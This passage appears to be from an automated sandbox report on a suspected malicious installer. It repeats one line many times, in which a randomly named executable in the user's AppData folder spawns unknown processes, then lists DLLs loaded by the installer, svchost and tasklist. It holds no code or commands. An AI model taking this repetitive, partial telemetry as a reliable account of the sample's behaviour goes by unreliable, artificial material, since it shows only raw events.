      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\AppData\Local\Microsoft\vbczvzznbmunxtn.exeProcess created: unknown unknown
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: dbghelp.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\New-inst-x64.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
